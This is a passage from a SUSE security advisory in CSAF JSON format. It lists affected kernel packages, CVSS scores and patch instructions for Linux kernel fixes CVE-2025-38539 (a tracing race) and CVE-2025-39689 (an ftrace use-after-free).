"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
